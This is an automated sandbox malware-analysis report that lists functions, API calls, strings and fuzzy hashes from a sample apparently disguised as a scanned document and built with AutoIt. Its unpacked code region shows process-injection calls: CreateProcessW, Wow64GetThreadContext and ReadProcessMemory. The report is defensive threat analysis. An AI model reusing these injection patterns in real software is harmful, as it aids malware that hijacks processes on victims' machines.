Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 1af3610197f05f0cb53a8ed0c5a9210c358c38ef6655f88735ee25528cc5781f
Instruction ID: f5a8d1759333075e14b3b029efbc512ade884b2e4a35cdfcecd61951b6ce5cc8
Opcode Fuzzy Hash: 1af3610197f05f0cb53a8ed0c5a9210c358c38ef6655f88735ee25528cc5781f
Instruction Fuzzy Hash: 697149714043419EC314EF69EC829ABBBECFF85750F40052EF595D6271EB749A88CB62

Function 00812B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00812B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00812B9D
LoadIconW.USER32(00000063), ref: 00812BB3
LoadIconW.USER32(000000A4), ref: 00812BC5
LoadIconW.USER32(000000A2), ref: 00812BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00812BEF
RegisterClassExW.USER32(?), ref: 00812C40

Part of subcall function 00812CD4: GetSysColorBrush.USER32(0000000F), ref: 00812D07
Part of subcall function 00812CD4: RegisterClassExW.USER32(00000030), ref: 00812D31
Part of subcall function 00812CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00812D42
Part of subcall function 00812CD4: InitCommonControlsEx.COMCTL32(?), ref: 00812D5F
Part of subcall function 00812CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00812D6F
Part of subcall function 00812CD4: LoadIconW.USER32(000000A9), ref: 00812D85
Part of subcall function 00812CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00812D94

Strings

AutoIt v3, xrefs: 00812C2F
0, xrefs: 00812C0F
#, xrefs: 00812C16

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 841ce70046bb376a8f7a34d3b337825a25546d0dcf586d5a8153c974930ca005
Instruction ID: 566497f35cd73b0777b6a1893f9670088470f49acf367bad21f69e2654847f03
Opcode Fuzzy Hash: 841ce70046bb376a8f7a34d3b337825a25546d0dcf586d5a8153c974930ca005
Instruction Fuzzy Hash: 8F211A74E00358AFDF109FA9EC99AAD7FB4FB48B50F04401AF600AABA0D7B91540CF90

Function 00813170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0081316A,?,?), ref: 008131D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0081316A,?,?), ref: 00813204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00813227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0081316A,?,?), ref: 00813232
CreatePopupMenu.USER32 ref: 00813246
PostQuitMessage.USER32(00000000), ref: 00813267

Strings

TaskbarCreated, xrefs: 0081322D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: c032a49f4d6a3bbb6d8b05cb31ef993f42502d18908bbce722400976e20d3638
Instruction ID: e8f68c7162b920a4dcbb59bf89ff49f55794255c27d25def45f7c6c9e18b1f70
Opcode Fuzzy Hash: c032a49f4d6a3bbb6d8b05cb31ef993f42502d18908bbce722400976e20d3638
Instruction Fuzzy Hash: 0A411531240248ABEF156B7C9D4EBFD3A5DFF06345F040125F912CA6A2CB759AC497A2

Function 01073E68 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01073F39
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0107415F

Memory Dump Source

Source File: 00000000.00000002.1461712896.0000000001071000.00000040.00000020.00020000.00000000.sdmp, Offset: 01071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1071000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction ID: b8a9048ec9a0c32390fc840bbf45c77669bf870013de474ca02e9ac76d7af20f
Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
Instruction Fuzzy Hash: 4AA12970E00209EBDB14DFA4C898BEEBBB5FF48304F208199E651BB281D7759A41CF94

Function 00812C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00812C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00812CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00811CAD,?), ref: 00812CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00811CAD,?), ref: 00812CCF

Strings

edit, xrefs: 00812CAC
AutoIt v3, xrefs: 00812C89, 00812C8E, 00812C8F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: ad81e5eb9d52156ebea3113c01fd9f0ac2ad7f11d57f8bf1234f731d13d37831
Instruction ID: 447cfe78fe1fbf10c62469f5e124a9c3062d706b740986cf57ab7e71c8df0eaa
Opcode Fuzzy Hash: ad81e5eb9d52156ebea3113c01fd9f0ac2ad7f11d57f8bf1234f731d13d37831
Instruction Fuzzy Hash: D4F0DA755402D07AEB311717AC8CE772EBDF7C7F50B04005AFA00AAAA0C6791851DBB0

Function 01073C28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01073B18: Sleep.KERNELBASE(000001F4), ref: 01073B29

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01073D5F

Strings

FYX2MGGVGMAHUE4K5, xrefs: 01073DC2, 01073DC5

Memory Dump Source

Source File: 00000000.00000002.1461712896.0000000001071000.00000040.00000020.00020000.00000000.sdmp, Offset: 01071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1071000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CreateFileSleep
String ID: FYX2MGGVGMAHUE4K5
API String ID: 2694422964-3947733173
Opcode ID: 236b84218430afd06ea1638ed6c5aaffb67e143de605b6afc4b362a05ef11a26
Instruction ID: 14b0f7e2e78718469d8aae942b73a3fd0a75d0267b92f6fcf7d71cf4a0e77bb9
Opcode Fuzzy Hash: 236b84218430afd06ea1638ed6c5aaffb67e143de605b6afc4b362a05ef11a26
Instruction Fuzzy Hash: A0516130D04248EBEF11DBE4C854BEEBB79BF19700F004599E249BB2C1D7B95A44CB6A

Function 00813B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00813B0F,SwapMouseButtons,00000004,?), ref: 00813B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00813B0F,SwapMouseButtons,00000004,?), ref: 00813B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00813B0F,SwapMouseButtons,00000004,?), ref: 00813B83

Strings

Control Panel\Mouse, xrefs: 00813B3E

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 555d6b3fcd49969f67b2f031193bb0affcdf75a59aa527396e03a057a4bc27dd
Instruction ID: e4202eb08fc690a025dcae76af8a2a199f1c21b9492d0237cb49944bb0a52f58
Opcode Fuzzy Hash: 555d6b3fcd49969f67b2f031193bb0affcdf75a59aa527396e03a057a4bc27dd
Instruction Fuzzy Hash: 4A112AB5514208FFDB208FA5DC44AEFB7BCFF05754B104459A805D7110E2319E809760

Function 01072B18 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 010732D3
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01073369
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0107338B

Memory Dump Source

Source File: 00000000.00000002.1461712896.0000000001071000.00000040.00000020.00020000.00000000.sdmp, Offset: 01071000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1071000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction ID: 03a4924e86bf6a009be0a959ef5b54aced636121354b44a6a048b156324d7e49
Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
Instruction Fuzzy Hash: 9B62E830E142589BEB24CBA4C850BDEB776FF58300F1091A9D14DEB394E7769E81CB59

Function 0081DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 008632B7

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 22a6118b3b8246d823128b5f69cd5cbbbd71a7353f5ed6e04278978523a4101e
Instruction ID: 4592eadd0ac73b6ca2aa409e1ab54e7e6c9543c23afa4b504255d20140d78115
Opcode Fuzzy Hash: 22a6118b3b8246d823128b5f69cd5cbbbd71a7353f5ed6e04278978523a4101e
Instruction Fuzzy Hash: DDC27871A00218CFCB24CF58D880AAEB7B9FF18314F258569ED56EB391D375AD81CB91

Function 0081EC40 Relevance: 5.7, APIs: 3, Instructions: 1195COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0081FE66

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 3427a055e1d7d217537bab77ccdb2a0f2a8481b6586e9ffa6de57e4c55c7118e
Instruction ID: f3fcfbaf70e985e64b121b4eb531d9886ffe1b2261a6195d7a16e9fd9715ccec
Opcode Fuzzy Hash: 3427a055e1d7d217537bab77ccdb2a0f2a8481b6586e9ffa6de57e4c55c7118e
Instruction Fuzzy Hash: FCB25874608350CFCB24CF18D490A6AB7E5FF99314F24496DEA96CB362D771E881CB92

Function 00813923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008533A2

Part of subcall function 00816B57: _wcslen.LIBCMT ref: 00816B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00813A04

Strings

Line: , xrefs: 008533EB

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: f898e73a4a0a5a029bdcb24788dd1951c4be2ea85f0c66297a5e4c0fee52286a
Instruction ID: f7ad172ad9bc62a971c3ad22bb4163d1ca81f594d342531531b8b6e67d2663e2
Opcode Fuzzy Hash: f898e73a4a0a5a029bdcb24788dd1951c4be2ea85f0c66297a5e4c0fee52286a
Instruction Fuzzy Hash: 0C31C071408344AAD721EB24DC49BEBB7ECFF45710F00452AF5A9D2291EB749A88C7C3

Function 0082FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00830668

Part of subcall function 008332A4: RaiseException.KERNEL32(?,?,?,0083068A,?,008E1444,?,?,?,?,?,?,0083068A,00811129,008D8738,00811129), ref: 00833304

__CxxThrowException@8.LIBVCRUNTIME ref: 00830685

Strings

Unknown exception, xrefs: 00830692

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 70f450372d2046d87ad7cb74f63b505c2541e4a74c343f62fd6fb0a99d3df6ff
Instruction ID: 1f9b1c075e757b0c57d5e5ec75beab75df3d570fc0cbec9dc52cbe26caf9fadc
Opcode Fuzzy Hash: 70f450372d2046d87ad7cb74f63b505c2541e4a74c343f62fd6fb0a99d3df6ff
Instruction Fuzzy Hash: A9F04F2490030DA78B00B6A8E856D9E776CFE90354FA04531BA24D6696EF71EAA5C9C2

Function 00897F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 008982F5
TerminateProcess.KERNEL32(00000000), ref: 008982FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 008984DD

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 84a3ddb488d0bc109424cbd2cfcb907b772cb434c1b7a0bfdc6bfc0918d63bee
Instruction ID: fc728ab48081ec8caff71a07e61676510e0e4bcd891129968d3492562147a6fc
Opcode Fuzzy Hash: 84a3ddb488d0bc109424cbd2cfcb907b772cb434c1b7a0bfdc6bfc0918d63bee
Instruction Fuzzy Hash: D4125B71A08301DFDB14DF28C484B6ABBE5FF85318F18895DE899CB252DB31E945CB92

Function 008110F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00811BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00811BF4
Part of subcall function 00811BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00811BFC
Part of subcall function 00811BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00811C07
Part of subcall function 00811BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00811C12
Part of subcall function 00811BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00811C1A
Part of subcall function 00811BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00811C22

Part of subcall function 00811B4A: RegisterWindowMessageW.USER32(00000004,?,008112C4), ref: 00811BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0081136A
OleInitialize.OLE32 ref: 00811388
CloseHandle.KERNEL32(00000000,00000000), ref: 008524AB

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: abdc362582c34a31939f49e048d1b5392abb1676fe61ac7541ee8e677d5f19ae
Instruction ID: 66d4253fc68642f6b399582e29ff7a58a7c123836cabdb7bf200b394822f1d9c
Opcode Fuzzy Hash: abdc362582c34a31939f49e048d1b5392abb1676fe61ac7541ee8e677d5f19ae
Instruction Fuzzy Hash: 9071AFB49113908ECF84DFBAADCD6993AE5FB8A344754823AD51ACF361EB304485CF45

Function 008486AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,008485CC,?,008D8CC8,0000000C), ref: 00848704
GetLastError.KERNEL32(?,008485CC,?,008D8CC8,0000000C), ref: 0084870E
__dosmaperr.LIBCMT ref: 00848739

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: db788b946ae34a1d4d492087b42fa33999ba9d5eb0589ff29ed1a6bd95a1e252
Instruction ID: abc4768bce2ce1454c727ceb15ec90634cc95136e9de1e95ad79b4375931a4f1
Opcode Fuzzy Hash: db788b946ae34a1d4d492087b42fa33999ba9d5eb0589ff29ed1a6bd95a1e252
Instruction Fuzzy Hash: 45016B33A04268A7D6A166386889B7F6749FB93778F3A0119F804CB2D3DEA08C818191

Function 00821310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 008217F6

Strings

CALL, xrefs: 008217C6

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 7ac4a193f8f2221136c39aff83ee3c586f55f7db92c6f07eacfc3113298e4cb1
Instruction ID: 3965bec3a115e1f5181c90ba785362d21301c1595a8de88dc52a889709fe5612
Opcode Fuzzy Hash: 7ac4a193f8f2221136c39aff83ee3c586f55f7db92c6f07eacfc3113298e4cb1
Instruction Fuzzy Hash: AC229B706082519FCB14DF18D488A2ABBF1FF95314F25896DF496CB3A2D731E991CB82

Function 00812DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00852C8C

Part of subcall function 00813AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00813A97,?,?,00812E7F,?,?,?,00000000), ref: 00813AC2

Part of subcall function 00812DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00812DC4

Strings

X, xrefs: 00852C5A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: c33de775d40a1e81797858fc4f541fcfa36956f51300283f8c6e20e2e4851625
Instruction ID: cee250f2fc234b8a31a18dd40ecb46e42e8a670ddd24d012f84a5adff0af0816
Opcode Fuzzy Hash: c33de775d40a1e81797858fc4f541fcfa36956f51300283f8c6e20e2e4851625
Instruction Fuzzy Hash: 9E21A170A0025C9ADB01DF98C845BEE7BBDFF49315F00405AE505E7241EBB45A9D8FA2

Function 00813837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00813908

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: fc746222cd93613b1398cff3baab47f162969943ed3f19d473e04b2b939a3c7c
Instruction ID: d399aed171162f956e8d2645737aa476e3207b86ef8833c0e647f1d65b97f09c
Opcode Fuzzy Hash: fc746222cd93613b1398cff3baab47f162969943ed3f19d473e04b2b939a3c7c
Instruction Fuzzy Hash: D9315AB05043019FD721DF24D8847D6BBE8FF49708F00092EE99AD7250E775AA84CB52

Function 00815745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0081949C,?,00008000), ref: 00815773
